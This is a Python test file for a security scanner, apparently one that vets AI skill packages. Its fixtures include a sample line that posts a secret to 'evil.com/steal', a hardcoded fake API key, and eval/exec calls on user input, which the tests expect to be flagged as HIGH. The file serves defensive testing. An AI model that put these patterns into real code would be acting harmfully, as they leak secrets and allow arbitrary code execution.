#!/usr/bin/env python3
"""Tests for SkillGuard scanner."""
import tempfile
import os
from pathlib import Path
from scan import scan_file, scan_skill, Finding
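def test_clean_skill():
    """A benign snippet must scan clean: a high trust score and no HIGH findings.

    The fixture is written into a ``TemporaryDirectory`` so it is removed even
    when ``scan_skill`` raises; a ``delete=False`` temp file unlinked only on
    the success path would be left behind on failure.
    """
    clean_source = """
def hello():
    print("Hello world")
    return 42
"""
    with tempfile.TemporaryDirectory() as tmpdir:
        target = Path(tmpdir) / "clean.py"
        target.write_text(clean_source, encoding="utf-8")
        findings, score = scan_skill(str(target))
    # 90 is this test's expectation for benign code; it is not derived from the scanner.
    assert score >= 90, f"Clean code should score high, got {score}"
    high = [finding for finding in findings if finding.severity == "HIGH"]
    assert not high, f"Clean code produced HIGH findings: {high}"
    print("✅ test_clean_skill passed")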
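def test_credential_detection():
    """A hardcoded API-key literal must yield a HIGH finding and a reduced score.

    The key value in the fixture is a constructed sample, not a live credential.
    The ``os.environ.get`` line is the acceptable pattern and is present only
    as surrounding context; this test does not assert whether it is flagged.
    The fixture lives in a ``TemporaryDirectory`` so it is cleaned up even if
    ``scan_skill`` raises.
    """
    credential_source = """
API_KEY = "sk-1234567890abcdef"
secret_token = os.environ.get('SECRET_KEY')
"""
    with tempfile.TemporaryDirectory() as tmpdir:
        target = Path(tmpdir) / "creds.py"
        target.write_text(credential_source, encoding="utf-8")
        findings, score = scan_skill(str(target))
    high = [finding for finding in findings if finding.severity == "HIGH"]
    assert len(high) >= 1, "Should detect credential patterns"
    assert score < 80, f"Credential code should score lower, got {score}"
    print("✅ test_credential_detection passed")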
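def test_exfiltration_detection():
    """An outbound POST carrying a secret must yield at least one HIGH finding.

    The fixture models the exfiltration shape the scanner is meant to catch:
    a dict holding a secret handed to ``requests.post`` against a remote URL.
    The fixture is written into a ``TemporaryDirectory`` so it is removed even
    when ``scan_skill`` raises.
    """
    exfil_source = """
import requests
data = {"key": secret}
requests.post("https://evil.com/steal", json=data)
"""
    with tempfile.TemporaryDirectory() as tmpdir:
        target = Path(tmpdir) / "exfil.py"
        target.write_text(exfil_source, encoding="utf-8")
        findings, score = scan_skill(str(target))
    high = [finding for finding in findings if finding.severity == "HIGH"]
    assert len(high) >= 1, "Should detect exfiltration"
    print("✅ test_exfiltration_detection passed")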
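def test_eval_detection():
    """Dynamic code execution (``eval`` and ``exec``) must each produce a HIGH finding.

    The fixture contains one ``eval`` and one ``exec`` call, so at least two
    HIGH findings are expected. The fixture is written into a
    ``TemporaryDirectory`` so it is removed even when ``scan_skill`` raises.
    """
    dynamic_exec_source = """
user_input = get_input()
eval(user_input) # Dangerous!
exec(compile(code, 'string', 'exec'))
"""
    with tempfile.TemporaryDirectory() as tmpdir:
        target = Path(tmpdir) / "dynamic.py"
        target.write_text(dynamic_exec_source, encoding="utf-8")
        findings, score = scan_skill(str(target))
    high = [finding for finding in findings if finding.severity == "HIGH"]
    assert len(high) >= 2, "Should detect eval and exec"
    print("✅ test_eval_detection passed")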
def test_directory_scan():
    """Scanning a directory must surface the issue in the one risky file it holds.

    Three files are laid out: a harmless script, a script with a hardcoded
    key literal, and a markdown skill description. Only the total finding
    count is asserted; attribution to ``danger.py`` is not checked here.
    """
    fixtures = {
        "safe.py": "print('hello')",
        "danger.py": "API_KEY = 'secret123'",
        "SKILL.md": "# Safe Skill\nThis is safe.",
    }
    with tempfile.TemporaryDirectory() as tmpdir:
        root = Path(tmpdir)
        for name, body in fixtures.items():
            (root / name).write_text(body)
        findings, score = scan_skill(tmpdir)
        assert len(findings) >= 1, "Should find issues in danger.py"
    print("✅ test_directory_scan passed")
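def test_json_output():
    """``scan.py --json`` run as a subprocess must emit JSON with ``trust_score`` and ``findings``.

    The scanner is launched with the interpreter running this test
    (``sys.executable``) and with ``scan.py`` resolved relative to this file
    rather than the current working directory, so the result does not depend
    on where the tests are invoked from. A non-zero exit is reported together
    with stderr instead of surfacing as an opaque JSON decode error on empty
    stdout. The fixture file lives in a ``TemporaryDirectory`` so it is
    cleaned up even if launching the subprocess raises.
    """
    import json
    import subprocess
    import sys

    # Assumes scan.py sits beside this test file, consistent with the
    # module-level `from scan import ...` — confirm if the layout changes.
    scanner = Path(__file__).resolve().with_name("scan.py")
    with tempfile.TemporaryDirectory() as tmpdir:
        target = Path(tmpdir) / "trivial.py"
        target.write_text("x = 1", encoding="utf-8")
        result = subprocess.run(
            [sys.executable, str(scanner), str(target), "--json"],
            capture_output=True,
            text=True,
        )
    assert result.returncode == 0, (
        f"scan.py exited {result.returncode}: {result.stderr}"
    )
    output = json.loads(result.stdout)
    assert "trust_score" in output
    assert "findings" in output
    print("✅ test_json_output passed")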
if __name__ == "__main__":
    # Run every test in declaration order; the first failing assert aborts the run.
    for test in (
        test_clean_skill,
        test_credential_detection,
        test_exfiltration_detection,
        test_eval_detection,
        test_directory_scan,
        test_json_output,
    ):
        test()
    print("\n🎉 All tests passed!")